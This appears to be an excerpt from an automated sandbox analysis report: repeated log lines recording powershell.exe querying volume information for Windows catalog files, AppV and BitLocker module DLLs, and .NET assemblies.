                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
